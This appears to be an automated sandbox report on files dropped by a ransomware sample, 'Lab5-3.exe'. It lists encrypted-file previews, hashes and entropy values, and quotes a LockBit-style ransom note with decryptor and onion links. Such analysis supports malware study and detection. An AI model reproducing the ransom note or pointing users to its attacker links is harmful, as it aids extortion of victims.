                                                                                                          Preview:d.,z......=!...........$.z...k%k'.?aU.C..j....3.U...*......1...w........M! .....h.P...|b..........h..f.....A..@..w.N).v.p.6O......\.._.#.\K..+..~{....b}|M.....]......._.[.A..=..a.b......)5....9&5J...l..z*.3.|...cTQ`>.v.Q.]q7...20Yx...Y'B.......N.m.0...eJ.z....7.B.<k.....a6u.....0m.4"K...o.fD.).M...CT2..fQ.rU5..6g.!..L=,n..nW.ai.&.<....9...ZtN...FQ..'.|L..7...i..`d..U..E'.v3.u.........sK.*j..V.T...-..'....M....v.E.c......t.2u.P.5.%...d..k....#...YI..$..u>..T.....!.fH.}...^._v.\.~..%.X.tF.f.T.M..-...b..&....rW..Kn&........h...-....... .Zj&1&A..Y...]w..;>.&..t~/.J..._+......5........j.,....*....#.6...`?..D.....-..\A(4.'..W..J..W..hg....B+?u.... |r8.k9k.c.`.&]....n..tE...S.sZ....H....L...&..%..<.....OOR......$?.Y3.1..;.X.5en.q..N.>.....<s37....5S..I.T5..A..ivpC.+h.[.%X...?...E.l..?^[W..T....M&..E....:.r..P....V...I.f...H[...g,?.&2@k>R....5...lQX...-.~.Q..Q..\-.7%@.8.T...P#.A..?....N2..z.....t.&A....?.IT...sfA~.ahk..Z.C*.....;...U.........h.\..1.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.925800122223511
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xS7Rxr6cS9qQ0H9Du985k9m5mS1YZVzseHfUTid3hBaUoSGFcmeykEdEElU92i:xS1xrs0H9ML2K7oGx0uKeY2ElUJ
                                                                                                          MD5:EFBE096AACE04CFD12BBA6349DB8DDE7
                                                                                                          SHA1:4194A079FD86C59D93A0CAE9F19188A72D4CAD8E
                                                                                                          SHA-256:25A700F8CFA1D79AFB7D53D9EAA2379D569006625A1FB3CBA656BAB707EECFBE
                                                                                                          SHA-512:13A13458634AD9F8D30B5D307C8C8B966140FBB70336AA13693BA2DCAB2B7D99E5C6E00A6A8E5FD8BD4B5CD75E017861B72B8430A6DA3DF0D82DE52585331B32
                                                                                                          Malicious:false
                                                                                                          Preview:qq..X.s..q......9...*..,z.t`....a.4%A.8.;........F:.r.&..R..,bF..6.2.!..&....q.'..i......S...4........Y....o2....-$...w..0......|.......8.. .nG....q......~F...r.v..NC.!`.. R..s...5.L.YV.H.F.uu.^......XT..9?.@2...S2.Z.6Z.,...{.b....[y4...r<.8...h..g.........x".w .....}..4F.AV......%..ihmU.....^C.[.cKX...OUo..6H..<..s.......*.@..B....C.\._....NP./y[..6...:.t.E....a... ..`.......I5.76!.....J........:>. ...'....&...en?Z.qf....bV.....=7....._.;.....5..U2...K...^].....}~X6-9.....j:bs..Q..8O...-..>...0....J\..O..Y...~.).[A.!..@l.C@.=...=..~lc194.'~b. u..6"|..Zp.f..js.I..S..}.n dA..Q[.7...A1e...z!....*....Bn<...V...mm...K....g..8.w....@.........U.....q"..[.z.C..[N.3...@i..j....VG..+y....Yk,...8U...G..UP^...8.b~.|J.8.EXH'..x....E$\=.Q.e.=..a..Fj.w...a.I.Z..B.o..`(.V.m`me...\.]D.;u.b9....`k..n.{.4....6..e..h6:P.R.,..|.%....zj.R..[.:...v.n..R.k...6=FI..Lhg../.l./..*.6..vB.G{.#.`....a....h...A...?..b(H$%.<.........f4...!..+.m......."...+...7...:.mJ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.925486358083077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5+7AEFc+cVA+O9KLg3U88OyQpRhHfUTid3hBaUoSGFcmeykEdEElU92i:aZuAz9KD2yQqGx0uKeY2ElUJ
                                                                                                          MD5:86784312981A42962684DCEF60A2AC07
                                                                                                          SHA1:7435841E466D8D69DE0297629ECBC943A6F24641
                                                                                                          SHA-256:A51E2CE6C8E64A5DF9EE80A1BB20CAE36847F62A733C0C9355DE57605EA49B51
                                                                                                          SHA-512:EF79C597A42D0EC426505ABDDD133CA440BD47E17BC624F26B3E640BB74B1AD0F6BA2F656E206D9AFAC69FDA6D9256E88D00BB75DBB7556D410B21F8825C2C43
                                                                                                          Malicious:false
                                                                                                          Preview:..P.!A....p;n0.Q..0.E..c........8..!...+/.....FAE-.._T7.!.B..1......r.-Xf.o&.ZQ....yL.e.c.."l.......i..."...0).`.=.....z1...O W..'L.?..;.F......K.+W9}y7l?..........v.[..u..hX1.E....-..x..\9!+Q{..P..@.u.h...M.da.....*..9.%.......P?r.n.]..q..^8.@.....F.s^<-.t...*.;.8......Q...Oc.p._..V.G..'.>.R.....l^0...d../.`.....^t..JZVx.Ml...>s..h]..D.U....e...:.KD.b6..V...C.r....Dk{a.M.#.*..c..%.m._....;........w.N..T...]...I..;2.y.."...3K..7.b..).=.3...5..0.l.;,.F.N.M.=..H[.=e_.&.}.wek.M..U)..].y]..*w.._d.....[...........=.A...H.X.Gx,I`....FV.(.FNm..%.r.kaK...^<...'V).N...&!EC.*...6g`%... ......G...i.~~g.a...c....>p........\O..9:e...Z..]....2[..3......".X..R.../.P..={L.8*f.L...U.o....)..P....%y.:..v..b..>....Z8..Eq..4.$.1........I.....a.!#s...z.....d..F\ep.j..w.G..........CxV.......ky......aI.......l}.]...$.{...;.....Z.'*..I.h..._I..M..7..6...T.....{.........c..6.9....x.b.93/5....a..O...`m.]1..i.^...:..c...0+.ng$.%]AwE.Q...x.'Gg....$...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.930445674478339
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4tv60TGtqWhQdgZO9YFHfUTid3hBaUoSGFcmeykEdEElU92i:660LCiYeGx0uKeY2ElUJ
                                                                                                          MD5:57C028416FD5CFE4E7341A851FFD0B42
                                                                                                          SHA1:0BE5B62A78D8F83F666FAA79B7A6758311C7DBC3
                                                                                                          SHA-256:2EBE5E2BBBD98E79493DB757C6371A445D5287E31729C9283A1F975C0C2D541E
                                                                                                          SHA-512:4634DF09F6C1E837CABE4C2F974096B86D2A0DB17D4E9AE682BA1C9728CC5B87F1685BBA6BE11CF3D6AA187B1B1235A98A5CA6DEA839B6EE28FA0C2871F3B635
                                                                                                          Malicious:false
                                                                                                          Preview:w5..8.N...#...u..z../dj)......^G)+q5..V...N..~..).....W%.s...Dd?.]al.B...3y....N~.U<.......|n?.J..g..k..$........2.j..E.....x;.....G.#..M.....cN......u..0......p....d.}..1om......3.#i..0-%:?..:..Jmy..!@D...a....@nw.a...46boG.R..T.Mp.2..D:0.:..$...*.....N.q..^..}...K............x.c..w.(@.D..v9g.t.8.....D{.......i.te.>rv.....R%'..^>.5..........d[.s..{...!.KB...v.pI.F.Y....X.+..Z.NS%W7a...\~../K....z_+....^j):...(kJ8*L..mN.S:.<g.R*.".pq....k.....R.\-G|..........st.*.B..T.... ..z."..J.Ht......l.....O.}}..V..i.p.S.......#-8B .X...)'..]a.b.Z.b..?;.. ...|... @g^.C..~>....oh..X1..;.$.m]+.R....G.XJc..n..P..l...G.4.....kw1.V..d.dK.-:.....w.P...n.CS!4.K..5..P.z.+.H.T.b.JT|.4O..1...8..B.../...'.G...)..\+..._.&......\.=.h7..H].I\..Dsu9..UhF..mk<.....u.....S....h..Z....[f..v.......MJ..@.4..vx.....|.....H...'.x..}}T..t..3L$,.[Z_s...6.....s..j..f6).}...}.~..I.YT/...|..;..pF.j.d.e...WA4|....=n(.....B.....{z8..V..\...q...b......nB.$.j..r.2...mgf...(..4.N..e..*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.930036683105264
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PgHppJqlxrfOkRyPcOrDXHsUHfUTid3hBaUoSGFcmeykEdEElU92i:4JpSGcyPcOrMGx0uKeY2ElUJ
                                                                                                          MD5:651266021123F562370B9302D79981D7
                                                                                                          SHA1:936D9080061632D58F5772941F7995C475FACD80
                                                                                                          SHA-256:165EFFE64E89C9F36130AD9926F62F7B607A9C9E97F1CF924036BC4363775B37
                                                                                                          SHA-512:455628D32FC0E515C3B4FE4980CADD59E72E3920CB86A95C6183386B4CEF8C53D6499FCAFB7CC90A1F9CA4655CAA42539828B06C248E54746035A7ADCEDDF4A7
                                                                                                          Malicious:false
                                                                                                          Preview:..HQ. .d87.Z1..X..rQ..+...n.....T....}=...f._..DX*.................M4n.&.{M._.x.p.._6..............?.\..M..'.....lK.j..Y...~...C.]"z.Q......K"..L....]..e.\d.x....w..T.U.V....q..".Ws]c^..<]V.0....R..i..AP3.m0bO^.....+\,..b...c..s8%...!$..i'$.6.....6.4..I[....t....h.}O. ..[..........,....(......(T..+.*.....o.2..w`......I.....Rm...E..o.b...3..%..._...bE...'x.....".}...3G.0Yw[-.A...5-........W.VF......Dd....2S..;pd.C.NZ........a..b1 c.c.E....M.\.u.zV.U6....>..&8F?.t,:.K..5.F..s.8N. ..`.2.z......(_%....\.^..=S..............,=....$'...Db.m.+....s.8:...."..u.g*.$.B......^...IKah........./...{r....0.OaV-....Xw.....,..s../...f@....oX.5.....92...._..u.dsO?L))X.@...h..AE...?.....L(.v.X}H.q_e......P....L-..o..U8a....<};=<...W...:..D...h...O$e.....-/..G.:....../.oE.?...@..Y,2^....~.....MA..e..t..)U..1...Bo.)...xG4.{.!......t....~.|..4.)..B....}.....U.........v...-5..V.Dj..).n.$..".j\......o....R..t.....6i.{..M.W&...,..l.yK....l..e..e
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.927361787701799
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BIAd9U9D7Mx5q5qKh23JAtK0L0j2c11tHfUTid3hBaUoSGFcmeykEdEElU92i:xU9DwLKuU0jjyGx0uKeY2ElUJ
                                                                                                          MD5:6B119E08AF7A15121A39F5003EE25981
                                                                                                          SHA1:8EA34D78F736E2CE212EC695504FC19E5311132D
                                                                                                          SHA-256:17CC181BDD8D7390D74DAEFA5A26E2B2292986B11B54746E0F9E4D2FAB850E44
                                                                                                          SHA-512:BCAFDB17850E0B6293E8F35C7F097F6D2FEC87A29FDBDD76538B0795BB2F1B09E18B02AE67A6A9F175B43B644DBE5A2B8E2959C8C2833CCDA8E0EB6D81DD5F2F
                                                                                                          Malicious:false
                                                                                                          Preview:... ...0..s87T.n.z3...^S..9..>...`.G.A.{_..3a...C..hV.L6...v.......g=....wJ:p.ap.Ie......d,..0....g.....9...1pB..;M..j.9..@..}J.%.....8...B.j6. .r.6pp.|...........CF.$Z.GX.B.b.v8..R,\Q.u3..J.pr.;..-d*.:....;.u#....@..9.M.I..Q...[.<Hm..M.........+..EM.sLM....}..7.6..&....o\...R..Z.Q.(G...5......^.Gi9.....i;J..'.Q.. ..dZ....p....i{...M....P..1t ....:...,...p..w....#%.u.Hk..S.6...0E..4....+.*?..U...A.Q.....n...QI.+...cX.~.....4..H.......ky....a.H|..D.-...n..g...KKUl.........~X.._...]...).<....r.......i.SE(.|.8.l [S7P.,q.`.N.......v!.....&.'%......p..3E.k2.=.. ..W!.sX...Q..w..u.iE.XT*.6.a....*roQ..s...[.6....|.@./.c....8.n......um....`..9.9...}lA#.l..kWA..a.0..}.^.w..jw..G..5.S.aiMHT:...R$tFr..........D..9\.....1....tz.....1.zof_-.y|.K...Ay.@T1o._%.s....2"l...7r.B.....*.._...5../!QR.e...I....a.F...sw.....y......%..R......($..m.......L.h..>...... Qew.W......vM.............VlD..)V..(X&;.QW.!....t..|7..W.5...O..Q_os=j"u{@.U...y........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9309465482745765
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MFKKdhuE29HnSidOpqOQ5wlh5PHfUTid3hBaUoSGFcmeykEdEElU92i:0KKd8BntOpqLWAGx0uKeY2ElUJ
                                                                                                          MD5:5C9BAEE7D559A86CDF5DDEABD6830E01
                                                                                                          SHA1:96EF1920604B9E513C6BE6F3BFB60C88A766374B
                                                                                                          SHA-256:18279DD7473C72BA64AF79EDC2AC90B20963BAD1F7EFC4A0EB2863FA2B163A15
                                                                                                          SHA-512:BDC793BFABD23E303D09B97894B1B17EDEAC981CA18B7EC01CDCFEFBB969C34AE55A1D097576390D2972381E0CA6F8AFB762CD29321A53C01DBF22E6B99B6988
                                                                                                          Malicious:false
                                                                                                          Preview:u.......3.@.S..U......O.|.fj..l.B.P..EK........vA..g]*..<..zy....t.=H..(.I.9.....>..y....S"....g.z.q..)-Z....{{t.*...q..B........8.U.d"u.[.f=..F...Y#......XH.M..\F.?...r.&*..i.+...cNb.GX......?Ny.....$.~...GO.K-'m.9.0.G8../......)t.OW.....sr.....C...<f.]Z.............IT.a.W..{.y.vlm...q..A.q...pM.v.Dq.dqq.......)....4..c.{m.}.):`..H.......hV..Q..x.,......d..a.P........a.0._].....s.]..$;.R.9..f..~...........@...p...r4u.r.8...l....?@Y3.?O...2.u..a...#p6..TL.....y/..5....g..N....i.A.E0....df"...d.w.hkr:....V.....s={ .....X\.o..nb.cB...b.4..I.q.Y..O1lb.......DY....K.......<.!%.i.?.K..)..1..b.0.PX8v...(7.4....#..Ce....T.M..krB..\.M.....M.Cw:...........I......k...CM9A..APu..%.....]AdU.n1+.!.(s...*.m.....k|..b.Nj+e.. .(./.X......2.p.K.~tSyc&...GGa;.N...+-T.r...]!....H~..]7....&..o.?...U....T....lJE...........[*%...$...;i.Q.d&.FMN.k....#........x....|$zV.g......#.t._.O.....J....2.....1....x.R..b...>.z.....^...#.............y,........~?.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.931247927421173
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CxERokjtnaGfIzk+2L6NEd13HfUTid3hBaUoSGFcmeykEdEElU92i:kEGmfIzgLZ1cGx0uKeY2ElUJ
                                                                                                          MD5:3F2D5D990B52823C1A4A35BAC7170878
                                                                                                          SHA1:5E2F84C06C957B53669AFCE6F841F611566C3044
                                                                                                          SHA-256:0E1DAFEF676CBC62CF576A190CF2F594D1DF0668BC60698AA86113C69CB083A5
                                                                                                          SHA-512:EB9E11C5A1DF3461FE5FAE4861271BAFCFFC62996B8093CCBC4DEBA11840DE2B8421180668381D0EA76DC537014DD82EF2CF1EB644AD8228FD2C4D2A65816D44
                                                                                                          Malicious:false
                                                                                                          Preview:..5.cM.d.u..'$t6F0.=.2.....k......L^N......a.......ud_.J .S....@0.G:/!..C....sd.C......:..u.....uN..<..Bzg...h....L)..@.(.-...j].....a..........g...F.....~.9r.@...6-~$Z.....QnJ.....p.o.$......]..AM....bqv;-9v9.{..{.<;.*Z@.f[].<.k.*.)C."'...h.F....x>k.Z.!..........Z..H..w.p%!.0u.9..s..o....|.{n,.<.........t..*oP..{~\..z.{..#.......$.XR.WK^...'g....YnG.[.i..c.B....../. ..Z.@EOxV.......y..z..:.^...;..Q..+...}.b..1..37U.SXv.=..B..r........PU$....>!|....R..y...Z.......e..`9.2.t.....LY.0:.'.....i.X..k...R).E.~..D...UY.........(...}.6...%..;....m..P.O.#..]..P.).\I.{......ah(...!M..|X.h...~.m.N.v"=:.]...q..... ...Z.).2.p......e...{1..%6..h..d.........AHZ}.T+.......f.Z...'.%t..{\1.U.'.9...W...T8!...F.3..........{..KB"......-...l.Fx'..iR...l.........+...+.r..b:..~"...d\...V2.....f..%....&.......$.cc..*..bj.. ...z}l....).'.....s.y..e/A. .q...e7..P...321..|.([8..w..9.xz.".(Oa3F'7za.6{. .).jc..M.3.. ..s:...l.0u.yK.?>n.[.h.9..n.:..%4bU>....[[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.935622337312004
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2FLgdVvCXnIwJwcUAFWjGQ6nB/HfUTid3hBaUoSGFcmeykEdEElU92i:2FLgvCXnI5DmaGx0uKeY2ElUJ
                                                                                                          MD5:778EA8189E007718C2C77F04300D2CD9
                                                                                                          SHA1:3493591E278BE26398D76D812A1D8E97345926E6
                                                                                                          SHA-256:DB75CC03DA9BC955E2ED77DFA6ED489DF55C03049FD2E893CAF5B2E0F550A7FF
                                                                                                          SHA-512:FDB838F00AAFD9302274D9B3B55F4055090A9F1EA938C602A7672E029E81CE3FD1216924E6D579AA24710A829B66327DDF3C9BCDFCA5FE32A8805F4F951E0228
                                                                                                          Malicious:false
                                                                                                          Preview:X&.8...<.SFv..Q.p:I&-.A...........,....F....].i...-...........<.r...)"...K.......U.,E....3..Fh5..c.a....BQ.z[#+=...c..&..Y$.`..Y@..(....b.S.......S.,M....`+.c.q.4..Oh.@.q..>.\.1.).XI.....@@.[.F..q_.Z.[.\.s...i.[...._l...(.._d.,R.z.....E.j...x].....Cd&TNf%...?.l..F/.q...g1.1 0.e.tg...\.....@m.".T....y..2.....!...nz..{:e..d......i.v".4?.:.Z..[....>.y.......|W?t..,tX......^CV..........A..J...'..D.....i..?.s...D.R...P.O...+......S...rE*).nkPh.,.....6x..h..:&...#..QM..&.i..Kz.. .-...F.J.._.\.A.nK..n..$..V.............p......tn..r..W..l_....f...3...T...hN.-....J..._m`..o.&.. E`..h"Vc.B....dI{NB.........[w...E.....%{.;..ZZ.L.....).P7........s.g..W..~...".........l..uJFk....+?hb9..j_.K.R.j].^.....T...^..yC.?...g.,..H5..KR......<o7.].f.C...<....dB.....w..(N.AsB..i......".u ..3q..!.Q.....sC...6......P...>.:..G......&.q.{z....?.7..b9..........&..:..E.4......\..r.E..qC.ge.^.dcq6.0...A....{..q.....%..K.j.E..'.Y....n0.h.O.v...g].h.2d...v.E/
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.935312322179397
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zt0LiqNmlbV2VMvCQnW2seIQtcHHfUTid3hBaUoSGFcmeykEdEElU92i:J09NMVkyW7eIQtvGx0uKeY2ElUJ
                                                                                                          MD5:5D41940F5693C3E96CC401E3915866CE
                                                                                                          SHA1:5E5B090BB1D9954399A1A4D6B1F905BC17E893C1
                                                                                                          SHA-256:1423AF9E29BF918DA46C0359218D10CC44A19449FE867DDB22FA69BC41E43543
                                                                                                          SHA-512:25780E93D9B3255AECA238C2DF0670EBB58AB58A4596BEB6143AB8AFCBF5F4697C9FD1B03BF7A7A0684F331FC3146BE6E8449C08C096CEF1A944BE5064CF678F
                                                                                                          Malicious:false
                                                                                                          Preview:...O.l...9......'.9R}... K|...U...]D...W.:c7Gk.v.Ocr_...J..f..v.#p.$D=.y...e.B.d......#}....;rn........j.iI..u....I.!.g..k..._.d...........K.*...tm.W=.z..=.VnS.|.F.Bj.0...AJ.ch...".N...y..6../.VMTGS.....T9.+k.n*.....7z./m.46...)... ....kzgN.Xy........@..r`I.......+...s.p.y.5....J.9.e.. |..>..I.....x....(..,./z...W..o..?.h.VA...A/..:.h..:I.(.J..Q..'..Oi.rBdK........,...Hp..i#...u.*........nC^;....5r.G...d...s(:...e!...ItG...5*.....W.[......O.......^*\Zh......PE....w..c1./..x.-...>..;..N|..u.c..:........;.I..=u.H.#m.....!...p....0........r...k.O.s...TK..s..<R.*..X"...i3..q...:.hW~x.. .g.u.}=m..d....W........7.V..|$6.E.VC....x....4Oi.cyb.#.g..[...}<..[E..=.}]E^C....{..K..F...3..r...|.z.]...M>..i..=E..m(w1.yY.y...{.k[.....BzV\.F.O..y.o:.J..6.3!.R.7k...G......K..N.)pcaH../5.L.@A..P.'n:....a.w.{..K.....-.6.h3....-..{...?....>.oXIP.....|l./......"......"....\....\.4.tF...-....@^..w....(;...f.A....7Wu.*`k......mN!....l.....L...a'f}......n.4l.{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.926635600602569
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5X3pjj7+tpn72pJLTWbSqjZenVkHfUTid3hBaUoSGFcmeykEdEElU92i:5X3pjO3ipNYj6FGx0uKeY2ElUJ
                                                                                                          MD5:E05D2FBD6A2351D1538C662EC06C3B7C
                                                                                                          SHA1:C301A5F872E5DA97175CDD712E549F5F5371F606
                                                                                                          SHA-256:86821A0A8CB222F3DB4059CE72582FE462348D7DDC5A3A734D4314AB7EF65514
                                                                                                          SHA-512:957DC0684D9D4B03D8EA005EC89D985B741B07C46F9E63A358FB0710AD54F99A27D35D6731ED2449FE89311CB6DAC6C5CCCB5BD6128A497FDBC1E6EA9097931B
                                                                                                          Malicious:false
                                                                                                          Preview:.w.l.....P.p..+A../H7 ..#.V..m.!.Jb..:b.....N.\.=i...I4.O. .F..m..US.....A.Kn..F...%......(:...O..).*.M.=.W..?.T..p...;.h....1...S.Pi...4g^S@u..5............[...r.).\..+7..H...%...<(N.\.(RA.>.J.-....HI.|.|.<..}..o....+.?......Q....^(...@...B...[..K....{......W~.=S.)....O....A.........l]?h.....@:...@f..6g.. .//..9..f.E).T3Z..E.R...0... Z..#.....#.340....\..zW..V$.A_y.....+..#.dh....#.E.Xm.........U]...4A..K.a...^....}.........t...BF..Jb.. K....mn...acKD....m.>.......Q..d.z.VY.^.7&.T.(.`..[..J).........mM.l.t/>.....;..2!.!Q....Zn0a..._.*E.K-......^..!..k{.D.x#..2."......V4B....{&....y....U........n...k..S.....aIi...%"...........-....B. O...Q.^.....Q.Yx.p^..R|.[^J....../W..FGO....vzq.4..cO|LC..h...C a...l.E...e.0...........O4.-.s....+...i0./9.;.......$.....F...I.......a.0.}oB........P.<..":5B..S.<>.c..a|.....r.o.+.f.V....v.GL..+...5z<..\..C.Z|..&.f&.b.s..N.W.[...ux.h....|....E"V.{...cH.....u.a.."N.}...B..4{@.0O...^.S..H....._
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.924914115779588
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pj54fCARj+TxlfA8RZals9dytAffiHfUTid3hBaUoSGFcmeykEdEElU92i:8dRaTY8Rkls94AdGx0uKeY2ElUJ
                                                                                                          MD5:78E7C889E710F5F8380883A5B7590002
                                                                                                          SHA1:0AF38AC65BE8D2EF2D95753A1551DB0CDB7ED84D
                                                                                                          SHA-256:34E56E3C68770AE5A1243B7BF46FDE9876D69FA87F9C718A179EF25AE5188BAB
                                                                                                          SHA-512:3DB5004B8C16EF5F0DACF10E3192FB6A0D759CF78646E9760E70E3C51EFE4EB61619EE4135AF44F60EDFB1B09DD7F93ED865BC1377892654DBD2EDBB138243BF
                                                                                                          Malicious:false
                                                                                                          Preview:D.hZ....$.....h..;&.O.G..-n.&.. .xfn/.Zz.2.].d.T..>. .N.....ab+.@.....q...Ayr....rH.F..H...........x.O...c.a...W..V8..i.u....."T.!.....0.Y.a....6A.<3].A.Az..D;.VL\..-.y.."..[..M....oH.N...|...{.....l.....e...a....? ~...6.......^...?....%.."...$.....eQ.<.m7^^....Q......$...Rb.(.q...ew......k.0n:..2..u..81J.r.k.....@.{?.y..7.......Y...@....[...vc6.M.Z....sC...kH..J..cY..W;....f.Vy.G.k.(q).>.@&.].1...J...&.s..3$7j..{T5..o..,.U.........*..).?.f..>...2...<..:.q.,..T2p:.Yp.&....... !.&..7Q%....[M`..y.<,.......4&].-.;....~.s..s.R.n.E.w.....3E...J-2.....|{.!.;..mpIK:.`<."%...[.....5.....E4.f......c...[5N..'......sW..x.G..L..;y$k...G.F....x..G[q.gZ......u$.......+...^.&CB..0...[.x.<ft..E!uaa...k.zB...2......W...=..n^.%..Kl..\wf".i..8.H}...=u...&]......m%.sk^.(..K..E..........._I..<b....?SW&C...t....f.......d.s$%....ytn...r...0...e....1L..h...f...H...W..............$0..z7]X.f..+..HL..Ec.f.6....[..f;......:..`.mM:...Jl&:.E...c.8l....R.Si...X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9244245935478075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+vz/9HdSsamLniCNeey8bwsLyyEiMHfUTid3hBaUoSGFcmeykEdEElU92i:WcsamLniCcn8Us2iLGx0uKeY2ElUJ
                                                                                                          MD5:947ACBE6C64C70B95461E0A7CED2B5CD
                                                                                                          SHA1:116ED4C28CE2D7830E4199D20E9B2EA52A12B07A
                                                                                                          SHA-256:39CBEC076A14D8C6EBF8EEC9F1B5A02D6479713F69D20EC716BE08C00A1BC598
                                                                                                          SHA-512:B97420A214783F2B8D38337020EB7C0257994B342A1ABE0AECB3F499C3ED575A9FD7A93CAC622489905CBE36D1601CCF4FD65C328CB38607EB97EBFF7B68A1D0
                                                                                                          Malicious:false
                                                                                                          Preview:.hZ.[..y.sz^o$>..k......`..#.'d...q......w..c...!..1..)rt....y.M.....#....E.k...awWT.}...<3...*...<....r.{.4c.T-.z.(.&.}.*.1k.}..+.T.m.~6.8.}.j...nSJokZ..v...G.D6=y,O...}...9.\....=.p$....&P&..w'..3c.('....k..1..x.}0f..@..zn......D...u..y.`..#aK!,Y=...]thw;c.9`......*8..G.{.l...$...C......aX.Z.%.U.E..N[...M+.x...@.Z..(K.e$.L.....f.k3tV...Q.C.}.I.7M...^........5...i...R....~..y....y..{7F..0~..'D..F.h......3*.L})>.r.M...24.b.&..-.#....1.'.#....A.....t@)...1<..zV.(l2..V.|.{....wf..m.w.;~E8W.C.....,.7G..U:....MN..:;..h+.k...?.}.q.#q.....E.}.c..5FUN....J...^.I....J..?.n.9.A......h.c..#...s.#.A.....sk.......1..PK....\O.G..+3...-...{...CH......N......v.JP[.....Z....)/......[..Q.vL..A]..=.s....A%...n..M.".^>..E..'.j.<..>.{......2%6_{JZ.KV.ur...1ue.,..F.b.`...f.Y.p...).C.e.^}.0C.vEM.X.I.:aa.......;DA.O.=..J..3T.~...Vx.f#.^...L].=Lh..yt...&..-...e...H........2..$.x...X..N.&.PbBr.rE....5q...8.....0..r..mM...o..g,3.. .!.=.}......R6W.M..f.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9361050345073325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YYrfap6Q2qARAoAmtTAfkLRVGVNLflPrSPw/HfUTid3hBaUoSGFcmeykEdEElU93:YYLMAHrtTAf64WoEGx0uKeY2ElUJ
                                                                                                          MD5:315774150F3C8BAB8AD03044F3908540
                                                                                                          SHA1:F6B1812C867C7D4EE105187C51FD6206D234798C
                                                                                                          SHA-256:73FCB3C469909F84FBD19A04A03BA06C85E01724E0C029158A7F5EC772A905E7
                                                                                                          SHA-512:02F63DD69D197C5F08048B05135CAA6BB15DD860330D235AFB0346A9AB04E9B7970B9F8284CD2936F20015574C2F9A7B27D04C73DDEBADB42ADF06C66DE1D2FB
